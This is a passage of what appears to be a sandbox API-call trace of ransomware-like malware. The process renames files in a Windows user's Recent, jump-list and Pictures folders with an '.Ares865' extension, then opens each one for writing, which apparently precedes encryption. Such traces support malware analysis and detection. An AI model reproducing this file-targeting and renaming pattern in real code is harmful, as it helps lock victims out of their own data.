param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_ibRiCNb.mkv.lnk.Ares865") returned 61 [0093.732] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_ibRiCNb.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\_ibricnb.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_ibRiCNb.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\_ibricnb.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\_ibRiCNb.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\_ibricnb.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.733] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6612) returned 1 [0093.735] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations" [0093.735] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.Ares865") returned 102 [0093.735] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.740] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0093.743] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.Ares865") returned 102 [0093.743] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8040) returned 1 [0093.747] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.Ares865") returned 102 [0093.747] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.749] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17315) returned 1 [0093.753] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.Ares865") returned 102 [0093.753] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.756] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6100) returned 1 [0093.758] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.Ares865") returned 102 [0093.758] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.767] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0093.782] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.Ares865") returned 102 [0093.782] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.784] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9215) returned 1 [0093.798] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.Ares865") returned 102 [0093.798] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.800] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8040) returned 1 [0093.803] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations" [0093.804] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.Ares865") returned 108 [0093.804] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.805] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=184976) returned 1 [0093.815] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.Ares865") returned 108 [0093.815] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6656) returned 1 [0093.819] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.Ares865") returned 108 [0093.819] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0093.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.820] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3584) returned 1 [0093.825] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0093.826] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0093.826] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.Ares865") returned 58 [0093.826] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0093.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.827] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=504) returned 1 [0093.831] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\REhVVs2rj.png.Ares865") returned 60 [0093.831] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\REhVVs2rj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rehvvs2rj.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\REhVVs2rj.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rehvvs2rj.png.ares865"), dwFlags=0x1) returned 1 [0093.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\REhVVs2rj.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rehvvs2rj.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.831] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32528) returned 1 [0093.835] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yfen8Z5pvAX5a.png.Ares865") returned 64 [0093.835] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yfen8Z5pvAX5a.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yfen8z5pvax5a.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yfen8Z5pvAX5a.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yfen8z5pvax5a.png.ares865"), dwFlags=0x1) returned 1 [0093.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yfen8Z5pvAX5a.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yfen8z5pvax5a.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.836] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=91894) returned 1 [0093.841] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YoQRYxYo8-B_fTukX LN.jpg.Ares865") returned 71 [0093.841] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YoQRYxYo8-B_fTukX LN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yoqryxyo8-b_ftukx ln.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YoQRYxYo8-B_fTukX LN.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yoqryxyo8-b_ftukx ln.jpg.ares865"), dwFlags=0x1) returned 1 [0093.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YoQRYxYo8-B_fTukX LN.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yoqryxyo8-b_ftukx ln.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.843] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67230) returned 1 [0093.848] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL" [0093.848] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\qMRTP.png.Ares865") returned 67 [0093.848] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\qMRTP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\qmrtp.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\qMRTP.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\qmrtp.png.ares865"), dwFlags=0x1) returned 1 [0093.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\qMRTP.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\qmrtp.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.850] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34337) returned 1 [0093.853] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\zTuAS8zyaJQEKix.gif.Ares865") returned 77 [0093.853] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\zTuAS8zyaJQEKix.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\ztuas8zyajqekix.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\zTuAS8zyaJQEKix.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\ztuas8zyajqekix.gif.ares865"), dwFlags=0x1) returned 1 [0093.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\zTuAS8zyaJQEKix.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\ztuas8zyajqekix.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69537) returned 1 [0093.859] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb" [0093.860] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb\\E9z0m.jpg.Ares865") returned 80 [0093.860] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb\\E9z0m.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\wlv6hyi5srhb\\e9z0m.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb\\E9z0m.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\wlv6hyi5srhb\\e9z0m.jpg.ares865"), dwFlags=0x1) returned 1 [0093.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb\\E9z0m.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\wlv6hyi5srhb\\e9z0m.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.861] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=82490) returned 1 [0093.866] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15" [0093.866] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\gP-zZnWV.gif.Ares865") returned 77 [0093.866] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\gP-zZnWV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\gp-zznwv.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\gP-zZnWV.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\gp-zznwv.gif.ares865"), dwFlags=0x1) returned 1 [0093.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\gP-zZnWV.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\gp-zznwv.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.871] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49406) returned 1 [0093.875] wsprintfW (in: 